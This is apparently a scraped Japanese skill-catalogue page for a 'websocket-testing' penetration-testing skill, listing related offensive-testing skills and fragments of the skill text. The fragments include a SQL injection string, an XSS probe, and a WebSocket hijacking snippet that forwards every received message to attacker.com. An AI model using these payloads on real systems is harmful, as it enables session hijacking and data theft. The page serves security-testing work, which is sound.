ワンクリックで
websocket-testing
WebSocket security testing — injection, auth bypass, hijacking
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
メニュー
WebSocket security testing — injection, auth bypass, hijacking
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies
| name | websocket-testing |
| description | WebSocket security testing — injection, auth bypass, hijacking |
| origin | RedteamOpencode |
ws:// or wss://)Upgrade: websocket observed in HTTP trafficws:// (unencrypted) vs wss:// (TLS)' OR 1=1--<script>alert(1)</script> — check if rendered to other usersjavascript var ws = new WebSocket('wss://target.com/ws'); ws.onmessage = function(e) { fetch('https://attacker.com/log?d=' + btoa(e.data)); };